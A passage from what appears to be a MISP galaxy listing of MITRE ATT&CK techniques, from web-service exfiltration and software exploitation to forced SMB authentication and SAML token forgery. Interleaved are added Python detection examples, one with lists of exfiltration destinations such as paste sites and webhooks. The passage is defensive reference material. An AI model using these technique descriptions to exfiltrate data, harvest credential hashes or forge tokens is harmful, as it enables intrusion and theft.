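The four sub-techniques above (webhooks, cloud storage, code repositories, text storage sites) and this parent technique share one detection problem: the destinations are legitimate services, so the signal is in who is uploading how much to which category of service, not in the destination alone. The block below is an added example of that aggregation, not code from Tidal, MISP or MITRE; the proxy log format, the destination prefixes, the host names and the 1 MB review threshold are all constructed assumptions.

```python
from collections import defaultdict
from typing import List, Optional, Tuple
from urllib.parse import urlparse

# Constructed destination prefixes (host + path), grouped by the sub-technique
# they correspond to.  A real deployment would take these from its proxy's
# URL categorisation and its own inventory of sanctioned services.
SERVICE_CATEGORIES = {
    "webhook": ("discord.com/api/webhooks", "hooks.slack.com/services", "webhook.site"),
    "cloud_storage": ("content.dropboxapi.com", "www.googleapis.com/upload/drive"),
    "code_repository": ("api.github.com",),
    "text_storage": ("pastebin.com/api",),
}
UPLOAD_METHODS = {"POST", "PUT", "PATCH"}
LARGE_UPLOAD_BYTES = 1_000_000  # assumed review threshold per (host, category): 1 MB of request bodies

# Constructed proxy log: "timestamp source_host method url request_bytes status".
SAMPLE_PROXY_LOG = [
    "2024-01-01T10:00:01Z ws-17 POST https://discord.com/api/webhooks/123/abc 412000 204",
    "2024-01-01T10:00:09Z ws-17 POST https://discord.com/api/webhooks/123/abc 398000 204",
    "2024-01-01T10:00:20Z ws-17 POST https://discord.com/api/webhooks/123/abc 405000 204",
    "2024-01-01T10:01:00Z ws-03 GET https://api.github.com/repos/org/app/commits 0 200",
    "2024-01-01T10:02:00Z ws-03 PUT https://api.github.com/repos/org/app/contents/notes.txt 2048 201",
    "2024-01-01T10:03:00Z ws-22 POST https://www.example.com/login 512 302",
    "2024-01-01T10:04:00Z ws-09 POST https://content.dropboxapi.com/2/files/upload 2500000 200",
]


def categorize(url: str) -> Optional[str]:
    """Map a URL to one of the service categories, or None if it matches none."""
    parsed = urlparse(url)
    host_path = parsed.netloc.lower() + parsed.path
    for category, prefixes in SERVICE_CATEGORIES.items():
        if any(host_path.startswith(prefix) for prefix in prefixes):
            return category
    return None


def parse_line(line: str) -> dict:
    """Split one constructed proxy line into its fields."""
    ts, src, method, url, req_bytes, status = line.split()
    return {"ts": ts, "src": src, "method": method.upper(), "url": url,
            "req_bytes": int(req_bytes), "status": int(status)}


def find_suspicious_uploads(lines: List[str], threshold: int = LARGE_UPLOAD_BYTES) -> List[Tuple[str, str, int]]:
    """Sum upload bytes per (source host, category) and return the pairs above the threshold.

    Only upload-style methods to a recognised service count; GETs and unknown
    destinations are ignored, so the result reflects outbound volume to the
    kinds of services the page names rather than ordinary browsing."""
    totals = defaultdict(int)
    for line in lines:
        entry = parse_line(line)
        if entry["method"] not in UPLOAD_METHODS:
            continue
        category = categorize(entry["url"])
        if category is None:
            continue
        totals[(entry["src"], category)] += entry["req_bytes"]
    return sorted((src, cat, total) for (src, cat), total in totals.items() if total > threshold)


if __name__ == "__main__":
    for src, category, total in find_suspicious_uploads(SAMPLE_PROXY_LOG):
        print(f"{src}: {total} bytes uploaded to {category} service(s)")
```

Because the traffic is HTTPS, the proxy only sees the request size and destination; the aggregation therefore keys on volume per host rather than on content. Three modest webhook posts from one workstation add up past the threshold in the sample, which is the pattern the page describes: many small, legitimate-looking requests to a service the network already talks to.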

Internal MISP references

UUID 66768217-acdd-4b52-902f-e29483630ad6 which can be used as unique global reference for Exfiltration Over Web Service in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Google Workspace', 'Linux', 'macOS', 'Office 365', 'SaaS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Exploitation for Client Execution

Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly use to do work, so those applications are a useful target for exploit research and development because of their high utility.

Several types exist:

Browser-based Exploitation

Web browsers are a common target through Drive-by Compromise and Spearphishing Link. Endpoint systems may be compromised through normal web browsing or from certain users being targeted by links in spearphishing emails to adversary controlled sites used to exploit the web browser. These often do not require an action by the user for the exploit to be executed.

Office Applications

Common office and productivity applications such as Microsoft Office are also targeted through Phishing. Malicious files will be transmitted directly as attachments or through links to download them. These require the user to open the document or file for the exploit to run.

Common Third-party Applications

Other applications that are commonly seen or are part of the software deployed in a target network may also be used for exploitation. Applications such as Adobe Reader and Flash, which are common in enterprise environments, have been routinely targeted by adversaries attempting to gain access to systems. Depending on the software and nature of the vulnerability, some may be exploited in the browser or require the user to open a file. For instance, some Flash exploits have been delivered as objects within Microsoft Office documents.

Internal MISP references

UUID 068df3d7-f788-44e4-9e6b-2ae443af1609 which can be used as unique global reference for Exploitation for Client Execution in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Exploitation for Credential Access

Adversaries may exploit software vulnerabilities in an attempt to collect credentials. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. 

Credentialing and authentication mechanisms may be targeted for exploitation by adversaries as a means to gain access to useful credentials or circumvent the process to gain authenticated access to systems. One example of this is MS14-068, which targets Kerberos and can be used to forge Kerberos tickets using domain user permissions.[Technet MS14-068][ADSecurity Detecting Forged Tickets] Another example of this is replay attacks, in which the adversary intercepts data packets sent between parties and then later replays these packets. If services don't properly validate authentication requests, these replayed packets may allow an adversary to impersonate one of the parties and gain unauthorized access or privileges.[Bugcrowd Replay Attack][Comparitech Replay Attack][Microsoft Midnight Blizzard Replay Attack]

Such exploitation has been demonstrated in cloud environments as well. For example, adversaries have exploited vulnerabilities in public cloud infrastructure that allowed for unintended authentication token creation and renewal.[Storm-0558 techniques for unauthorized email access]

Exploitation for credential access may also result in Privilege Escalation depending on the process targeted or credentials obtained.

Internal MISP references

UUID afdfa503-0464-4b42-a79c-a6fc828492ef which can be used as unique global reference for Exploitation for Credential Access in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Azure AD', 'Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Exploitation for Defense Evasion

Adversaries may exploit a system or application vulnerability to bypass security features. Exploitation of a vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Vulnerabilities may exist in defensive security software that can be used to disable or circumvent them.

Adversaries may have prior knowledge through reconnaissance that security software exists within an environment or they may perform checks during or shortly after the system is compromised for Security Software Discovery. The security software will likely be targeted directly for exploitation. There are examples of antivirus software being targeted by persistent threat groups to avoid detection.

There have also been examples of vulnerabilities in public cloud infrastructure of SaaS applications that may bypass defense boundaries [Salesforce zero-day in facebook phishing attack], evade security logs [Bypassing CloudTrail in AWS Service Catalog], or deploy hidden infrastructure.[GhostToken GCP flaw]

Internal MISP references

UUID 15b65bf2-dbe5-47bc-be09-ed97684bf391 which can be used as unique global reference for Exploitation for Defense Evasion in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['IaaS', 'Linux', 'macOS', 'SaaS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Exploitation for Privilege Escalation

Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.

When initially gaining access to a system, an adversary may be operating within a lower privileged process which will prevent them from accessing certain resources on the system. Vulnerabilities may exist, usually in operating system components and software commonly running at higher permissions, that can be exploited to gain higher levels of access on the system. This could enable someone to move from unprivileged or user level permissions to SYSTEM or root permissions depending on the component that is vulnerable. This could also enable an adversary to move from a virtualized environment, such as within a virtual machine or container, onto the underlying host. This may be a necessary step for an adversary compromising an endpoint system that has been properly configured and limits other privilege escalation methods.

Adversaries may bring a signed vulnerable driver onto a compromised machine so that they can exploit the vulnerability to execute code in kernel mode. This process is sometimes referred to as Bring Your Own Vulnerable Driver (BYOVD).[ESET InvisiMole June 2020][Unit42 AcidBox June 2020] Adversaries may include the vulnerable driver with files delivered during Initial Access or download it to a compromised system via Ingress Tool Transfer or Lateral Tool Transfer.

Internal MISP references

UUID 9cc715d7-9969-485f-87a2-c9f7ed3cc44c which can be used as unique global reference for Exploitation for Privilege Escalation in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Containers', 'Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Exploitation of Remote Services

Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system.

An adversary may need to determine if the remote system is in a vulnerable state, which may be done through Network Service Discovery or other Discovery methods looking for common, vulnerable software that may be deployed in the network, the lack of certain patches that may indicate vulnerabilities, or security software that may be used to detect or contain remote exploitation. Servers are likely a high value target for lateral movement exploitation, but endpoint systems may also be at risk if they provide an advantage or access to additional resources.

There are several well-known vulnerabilities that exist in common services such as SMB [CIS Multiple SMB Vulnerabilities] and RDP [NVD CVE-2017-0176] as well as applications that may be used within internal networks such as MySQL [NVD CVE-2016-6662] and web server services.[NVD CVE-2014-7169]

Depending on the permissions level of the vulnerable remote service an adversary may achieve Exploitation for Privilege Escalation as a result of lateral movement exploitation as well.

Internal MISP references

UUID 51ff4ada-8a71-4801-9cb8-a6e216eaa4e4 which can be used as unique global reference for Exploitation of Remote Services in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Exploit Public-Facing Application

Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network. The weakness in the system can be a software bug, a temporary glitch, or a misconfiguration.

Exploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet accessible open sockets.[NVD CVE-2016-6662][CIS Multiple SMB Vulnerabilities][US-CERT TA18-106A Network Infrastructure Devices 2018][Cisco Blog Legacy Device Attacks][NVD CVE-2014-7169] Depending on the flaw being exploited this may also involve Exploitation for Defense Evasion.

If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs, exploit container host access via Escape to Host, or take advantage of weak identity and access management policies.

Adversaries may also exploit edge network infrastructure and related appliances, specifically targeting devices that do not support robust host-based defenses.[Mandiant Fortinet Zero Day][Wired Russia Cyberwar]

For websites and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities.[OWASP Top 10][CWE top 25]

Internal MISP references

UUID 4695fd01-43a5-4aa9-ab1a-501fc0dfbd6a which can be used as unique global reference for Exploit Public-Facing Application in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Containers', 'IaaS', 'Linux', 'macOS', 'Network', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

External Remote Services

Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as Windows Remote Management and VNC can also be used externally.[MacOS VNC software for Remote Desktop]

Access to Valid Accounts to use the service is often a requirement, which could be obtained through credential pharming or by obtaining the credentials from users after compromising the enterprise network.[Volexity Virtual Private Keylogging] Access to remote services may be used as a redundant or persistent access mechanism during an operation.

Access may also be gained through an exposed service that doesn’t require authentication. In containerized environments, this may include an exposed Docker API, Kubernetes API server, kubelet, or web application such as the Kubernetes dashboard.[Trend Micro Exposed Docker Server][Unit 42 Hildegard Malware]

Internal MISP references

UUID c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4 which can be used as unique global reference for External Remote Services in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Containers', 'Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Fallback Channels

Adversaries may use fallback or alternate communication channels if the primary channel is compromised or inaccessible in order to maintain reliable command and control and to avoid data transfer thresholds.

Internal MISP references

UUID be8786b3-cd3d-47ef-a9e7-cd3ab3c901a1 which can be used as unique global reference for Fallback Channels in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

File and Directory Discovery

Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

Many command shell utilities can be used to obtain this information. Examples include dir, tree, ls, find, and locate.[Windows Commands JPCERT] Custom tools may also be used to gather file and directory information and interact with the Native API. Adversaries may also leverage a Network Device CLI on network devices to gather file and directory information (e.g. dir, show flash, and/or nvram).[US-CERT-TA18-106A]

Internal MISP references

UUID 1492c4ba-c933-47b8-953d-6de3db8cfce8 which can be used as unique global reference for File and Directory Discovery in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Network', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Linux and Mac File and Directory Permissions Modification

Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.[Hybrid Analysis Icacls1 June 2018][Hybrid Analysis Icacls2 May 2018] File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).

Most Linux and Linux-based platforms provide a standard set of permission groups (user, group, and other) and a standard set of permissions (read, write, and execute) that are applied to each group. While nuances of each platform’s permissions implementation may vary, most of the platforms provide two primary commands used to manipulate file and directory ACLs: chown (short for change owner), and chmod (short for change mode).

Adversaries may use these commands to make themselves the owner of files and directories or change the mode if current permissions allow it. They could subsequently lock others out of the file. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via Unix Shell Configuration Modification or tainting/hijacking other instrumental binary/configuration files via Hijack Execution Flow.[20 macOS Common Tools and Techniques]

Internal MISP references

UUID 5c6687f6-3539-4268-a6a4-2b98fdeac0fb which can be used as unique global reference for Linux and Mac File and Directory Permissions Modification in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1222.002
Related clusters

To see the related clusters, click here.

Windows File and Directory Permissions Modification

Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.[Hybrid Analysis Icacls1 June 2018][Hybrid Analysis Icacls2 May 2018] File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).

Windows implements file and directory ACLs as Discretionary Access Control Lists (DACLs).[Microsoft DACL May 2018] Similar to a standard ACL, DACLs identify the accounts that are allowed or denied access to a securable object. When an attempt is made to access a securable object, the system checks the access control entries in the DACL in order. If a matching entry is found, access to the object is granted. Otherwise, access is denied.[Microsoft Access Control Lists May 2018]
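The ordered walk described above is what makes ACE ordering a security property: a deny entry only protects a file if it is encountered before an allow entry that already satisfies the request. The following is an added model of that evaluation, not Microsoft's code; the right bits, the SIDs and the sample DACL are constructed, and inheritance flags and generic-right mapping are not modelled. It also shows the two degenerate cases a reviewer should know apart, a NULL DACL (no protection) and an empty DACL (no access).

```python
from dataclasses import dataclass
from typing import List, Optional, Set

# Constructed access-right bits; the real Windows access masks use different values.
READ, WRITE, EXECUTE = 0x1, 0x2, 0x4
FULL = READ | WRITE | EXECUTE

# Constructed SIDs for the worked example.
USER_SID = "S-1-5-21-1000-2000-3000-1001"
USERS_GROUP_SID = "S-1-5-32-545"  # BUILTIN\Users; the example user belongs to it


@dataclass(frozen=True)
class ACE:
    """One access control entry: trustee, allow/deny type, and access mask."""
    trustee: str
    allow: bool   # True = ACCESS_ALLOWED_ACE, False = ACCESS_DENIED_ACE
    mask: int


# Canonical order: explicit deny entries before explicit allow entries.
CANONICAL_DACL = [
    ACE(USER_SID, False, WRITE),        # deny write to this one user
    ACE(USERS_GROUP_SID, True, FULL),   # allow full control to Users
]


def check_access(dacl: Optional[List[ACE]], token_sids: Set[str], requested: int) -> bool:
    """Walk the DACL in order and decide whether all `requested` rights are granted.

    - None models a NULL DACL: everyone gets everything.
    - An empty list models an empty DACL: nobody gets anything.
    - A matching deny ACE that covers any requested right stops evaluation with a denial.
    - Matching allow ACEs accumulate; once every requested right is granted, access is allowed.
    - Reaching the end with rights still outstanding is an implicit denial.
    """
    if dacl is None:
        return True
    remaining = requested
    for ace in dacl:
        if ace.trustee not in token_sids:
            continue
        if not ace.allow:
            if ace.mask & requested:
                return False
        else:
            remaining &= ~ace.mask
            if remaining == 0:
                return True
    return remaining == 0


def is_canonical(dacl: List[ACE]) -> bool:
    """True if no allow ACE precedes a deny ACE (a cheap sanity check for edited DACLs)."""
    seen_allow = False
    for ace in dacl:
        if ace.allow:
            seen_allow = True
        elif seen_allow:
            return False
    return True


if __name__ == "__main__":
    token = {USER_SID, USERS_GROUP_SID}
    print("canonical, write:", check_access(CANONICAL_DACL, token, WRITE))                  # False
    print("reversed,  write:", check_access(list(reversed(CANONICAL_DACL)), token, WRITE))  # True
```

With the two entries reversed, the allow-FULL entry for Users satisfies the write request before the user-specific deny is ever reached, so the deny is dead weight. Tools that rewrite DACLs in place can leave a list in that non-canonical state, which is why a review of permission changes should check ordering and not just the presence of a deny entry.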

Adversaries can interact with the DACLs using built-in Windows commands, such as icacls, cacls, takeown, and attrib, which can grant adversaries higher permissions on specific files and folders. Further, PowerShell provides cmdlets that can be used to retrieve or modify file and directory DACLs. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via Accessibility Features, Boot or Logon Initialization Scripts, or tainting/hijacking other instrumental binary/configuration files via Hijack Execution Flow.

Internal MISP references

UUID 9d36254c-e568-4c03-8688-e6eed5f7510c which can be used as unique global reference for Windows File and Directory Permissions Modification in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1222.001
Related clusters

To see the related clusters, click here.

File and Directory Permissions Modification

Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.[Hybrid Analysis Icacls1 June 2018][Hybrid Analysis Icacls2 May 2018] File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).

Modifications may include changing specific access rights, which may require taking ownership of a file or directory and/or elevated permissions depending on the file or directory’s existing permissions. This may enable malicious activity such as modifying, replacing, or deleting specific files or directories. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via Accessibility Features, Boot or Logon Initialization Scripts, Unix Shell Configuration Modification, or tainting/hijacking other instrumental binary/configuration files via Hijack Execution Flow.

Adversaries may also change permissions of symbolic links. For example, malware (particularly ransomware) may modify symbolic links and associated settings to enable access to files from local shortcuts with remote paths.[new_rust_based_ransomware][bad_luck_blackcat][falconoverwatch_blackcat_attack][blackmatter_blackcat][fsutil_behavior]

Internal MISP references

UUID cb2e4822-2529-4216-b5b8-75158c5f85ff which can be used as unique global reference for File and Directory Permissions Modification in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Financial Theft

Adversaries may steal monetary resources from targets through extortion, social engineering, technical theft, or other methods aimed at their own financial gain at the expense of the availability of these resources for victims. Financial theft is the ultimate objective of several popular campaign types including extortion by ransomware,[FBI-ransomware] business email compromise (BEC) and fraud,[FBI-BEC] "pig butchering,"[wired-pig butchering] bank hacking,[DOJ-DPRK Heist] and exploiting cryptocurrency networks.[BBC-Ronin]

Adversaries may Compromise Accounts to conduct unauthorized transfers of funds.[Internet crime report 2022] In the case of business email compromise or email fraud, an adversary may utilize Impersonation of a trusted entity. Once the social engineering is successful, victims can be deceived into sending money to financial accounts controlled by an adversary.[FBI-BEC] This creates the potential for multiple victims (i.e., compromised accounts as well as the ultimate monetary loss) in incidents involving financial theft.[VEC]

Extortion by ransomware may occur, for example, when an adversary demands payment from a victim after Data Encrypted for Impact [NYT-Colonial] and Exfiltration of data, followed by threatening public exposure unless payment is made to the adversary.[Mandiant-leaks]

Due to the potentially immense business impact of financial theft, an adversary may also stage an apparent financial motive, seeking monetary gain, to divert attention from their true goals such as Data Destruction and business disruption.[AP-NotPetya]

Internal MISP references

UUID b9c9fd13-c10c-5e78-aeeb-ac18dc0605f9 which can be used as unique global reference for Financial Theft in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Google Workspace', 'Linux', 'macOS', 'Office 365', 'SaaS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Firmware Corruption

Adversaries may overwrite or corrupt the flash memory contents of system BIOS or other firmware in devices attached to a system in order to render them inoperable or unable to boot, thus denying the availability to use the devices and/or the system.[Symantec Chernobyl W95.CIH] Firmware is software that is loaded and executed from non-volatile memory on hardware devices in order to initialize and manage device functionality. These devices may include the motherboard, hard drive, or video cards.

In general, adversaries may manipulate, overwrite, or corrupt firmware in order to deny the use of the system or devices. For example, corruption of firmware responsible for loading the operating system for network devices may render the network devices inoperable.[dhs_threat_to_net_devices][cisa_malware_orgs_ukraine] Depending on the device, this attack may also result in Data Destruction.

Internal MISP references

UUID 559c647a-7759-4943-856d-dc717b5a443e which can be used as unique global reference for Firmware Corruption in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Network', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Forced Authentication

Adversaries may gather credential material by invoking or forcing a user to automatically provide authentication information through a mechanism in which they can intercept.

The Server Message Block (SMB) protocol is commonly used in Windows networks for authentication and communication between systems for access to resources and file sharing. When a Windows system attempts to connect to an SMB resource it will automatically attempt to authenticate and send credential information for the current user to the remote system. [Wikipedia Server Message Block] This behavior is typical in enterprise environments so that users do not need to enter credentials to access network resources.

Web Distributed Authoring and Versioning (WebDAV) is also typically used by Windows systems as a backup protocol when SMB is blocked or fails. WebDAV is an extension of HTTP and will typically operate over TCP ports 80 and 443. [Didier Stevens WebDAV Traffic] [Microsoft Managing WebDAV Security]

Adversaries may take advantage of this behavior to gain access to user account hashes through forced SMB/WebDAV authentication. An adversary can send an attachment to a user through spearphishing that contains a resource link to an external server controlled by the adversary (i.e. Template Injection), or place a specially crafted file on a navigation path for privileged accounts (e.g. .SCF file placed on desktop) or on a publicly accessible share to be accessed by victim(s). When the user's system accesses the untrusted resource it will attempt authentication and send information, including the user's hashed credentials, over SMB to the adversary controlled server. [GitHub Hashjacking] With access to the credential hash, an adversary can perform off-line Brute Force cracking to gain access to plaintext credentials. [Cylance Redirect to SMB]

There are several different ways this can occur. [Osanda Stealing NetNTLM Hashes] Some specifics from in-the-wild use include:

  • A spearphishing attachment containing a document with a resource that is automatically loaded when the document is opened (i.e. Template Injection). The document can include, for example, a request similar to file[:]//[remote address]/Normal.dotm to trigger the SMB request. [US-CERT APT Energy Oct 2017]
  • A modified .LNK or .SCF file with the icon filename pointing to an external reference such as \[remote address]\pic.png that will force the system to load the resource when the icon is rendered to repeatedly gather credentials. [US-CERT APT Energy Oct 2017]

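
Both in-the-wild patterns above end the same way on the network: a workstation opens an SMB connection, or falls back to WebDAV, toward an address outside the organisation. The block below is an added detection example, not code from the page's sources, that flags exactly that from a connection log; the log format, the service labels, the internal address ranges and the sample addresses (IANA documentation space) are constructed assumptions.

```python
import ipaddress
from typing import Dict, List, Tuple

# Assumed internal address space: RFC 1918 plus loopback and link-local.
# A real deployment would substitute its own allocated ranges.
INTERNAL_NETWORKS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]
SMB_PORTS = {445, 139}

# Constructed connection log: "timestamp src_ip dst_ip dst_port service", where the
# service label is assumed to come from protocol inspection on the sensor.
SAMPLE_CONN_LOG = [
    "2024-02-03T09:12:01Z 10.20.1.15 10.20.1.5 445 smb",       # internal file server: expected
    "2024-02-03T09:12:07Z 10.20.1.15 203.0.113.40 445 smb",    # SMB straight to an external host
    "2024-02-03T09:12:09Z 10.20.1.15 203.0.113.40 80 webdav",  # WebDAV fallback to the same host
    "2024-02-03T09:13:00Z 10.20.1.22 198.51.100.7 443 https",  # ordinary browsing: ignored
    "2024-02-03T09:14:30Z 10.20.2.8 203.0.113.40 445 smb",     # a second workstation, same host
]


def is_external(ip_text: str) -> bool:
    """True when the address falls outside every internal range."""
    ip = ipaddress.ip_address(ip_text)
    return not any(ip in net for net in INTERNAL_NETWORKS)


def parse_conn(line: str) -> dict:
    """Split one constructed log line into its fields."""
    ts, src, dst, port, service = line.split()
    return {"ts": ts, "src": src, "dst": dst, "port": int(port), "service": service.lower()}


def find_forced_auth_candidates(lines: List[str]) -> List[Tuple[str, str, int, str]]:
    """Return distinct (src, dst, port, service) tuples for outbound SMB or WebDAV to external hosts.

    SMB is recognised by service label or by the classic ports; WebDAV shares
    ports with ordinary HTTP(S), so it relies on the sensor's label alone."""
    findings = set()
    for line in lines:
        conn = parse_conn(line)
        if not is_external(conn["dst"]):
            continue
        outbound_smb = conn["service"] == "smb" or conn["port"] in SMB_PORTS
        outbound_webdav = conn["service"] == "webdav"
        if outbound_smb or outbound_webdav:
            findings.add((conn["src"], conn["dst"], conn["port"], conn["service"]))
    return sorted(findings)


def sources_per_destination(findings: List[Tuple[str, str, int, str]]) -> Dict[str, int]:
    """Count distinct internal sources per external destination; several sources
    converging on one external address is the 'shared file or share' pattern."""
    per_dst: Dict[str, set] = {}
    for src, dst, _port, _service in findings:
        per_dst.setdefault(dst, set()).add(src)
    return {dst: len(srcs) for dst, srcs in per_dst.items()}


if __name__ == "__main__":
    hits = find_forced_auth_candidates(SAMPLE_CONN_LOG)
    for hit in hits:
        print("outbound authentication candidate:", hit)
    print("sources per external destination:", sources_per_destination(hits))
```

The same logic doubles as a policy check: if outbound TCP 445/139 is already blocked at the perimeter, the SMB findings should be empty and anything that remains is a WebDAV fallback worth blocking or proxying as well.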
Internal MISP references

UUID e732e1d4-fffa-4fc3-b387-47782c821688 which can be used as unique global reference for Forced Authentication in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
source MITRE
Related clusters

To see the related clusters, click here.

SAML Tokens

An adversary may forge SAML tokens with any permissions claims and lifetimes if they possess a valid SAML token-signing certificate.[Microsoft SolarWinds Steps] The default lifetime of a SAML token is one hour, but the validity period can be specified in the NotOnOrAfter value of the conditions ... element in a token. This value can be changed using the AccessTokenLifetime in a LifetimeTokenPolicy.[Microsoft SAML Token Lifetimes] Forged SAML tokens enable adversaries to authenticate across services that use SAML 2.0 as an SSO (single sign-on) mechanism.[Cyberark Golden SAML]

An adversary may utilize Private Keys to compromise an organization's token-signing certificate to create forged SAML tokens. If the adversary has sufficient permissions to establish a new federation trust with their own Active Directory Federation Services (AD FS) server, they may instead generate their own trusted token-signing certificate.[Microsoft SolarWinds Customer Guidance] This differs from Steal Application Access Token and other similar behaviors in that the tokens are new and forged by the adversary, rather than stolen or intercepted from legitimate users.

An adversary may gain administrative Azure AD privileges if a SAML token is forged which claims to represent a highly privileged account. This may lead to Use Alternate Authentication Material, which may bypass multi-factor and other authentication protection mechanisms.[Microsoft SolarWinds Customer Guidance]
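Two of the properties described above are checkable by the relying party: the assertion's validity window, which should stay near the one-hour default rather than the arbitrary lifetimes a forger can choose, and the certificate that signed it, which should be one the organisation knows. The block below is an added example of those checks and is not Microsoft's or any identity provider's code; the assertion XML, the issuer name, the "certificates" (arbitrary bytes standing in for DER) and the lifetime limit are constructed, and verification of the XML signature itself is left to a proper library such as xmlsec.

```python
import base64
import hashlib
import xml.etree.ElementTree as ET
from datetime import datetime, timedelta, timezone
from typing import List, Set

NS = {"saml": "urn:oasis:names:tc:SAML:2.0:assertion",
      "ds": "http://www.w3.org/2000/09/xmldsig#"}
MAX_LIFETIME = timedelta(hours=1)   # assumed policy, matching the default lifetime the page names

# Constructed stand-ins for DER certificates; not real X.509 data.
TRUSTED_CERT_B64 = base64.b64encode(b"constructed trusted token-signing cert").decode()
ROGUE_CERT_B64 = base64.b64encode(b"constructed attacker-controlled cert").decode()


def cert_fingerprint(b64_der: str) -> str:
    """SHA-256 over the decoded <ds:X509Certificate> contents."""
    der = base64.b64decode("".join(b64_der.split()))
    return hashlib.sha256(der).hexdigest()


TRUSTED_FINGERPRINTS: Set[str] = {cert_fingerprint(TRUSTED_CERT_B64)}


def build_assertion(not_before: str, not_on_or_after: str, cert_b64: str) -> str:
    """Assemble a minimal constructed assertion carrying only the fields this check inspects."""
    return f"""<saml:Assertion xmlns:saml="{NS['saml']}" xmlns:ds="{NS['ds']}" ID="_constructed">
  <saml:Issuer>https://sts.example.test/adfs/services/trust</saml:Issuer>
  <ds:Signature><ds:KeyInfo><ds:X509Data>
    <ds:X509Certificate>{cert_b64}</ds:X509Certificate>
  </ds:X509Data></ds:KeyInfo></ds:Signature>
  <saml:Conditions NotBefore="{not_before}" NotOnOrAfter="{not_on_or_after}"/>
</saml:Assertion>"""


def parse_utc(text: str) -> datetime:
    return datetime.strptime(text, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def assess_assertion(xml_text: str, trusted_fingerprints: Set[str], now: datetime,
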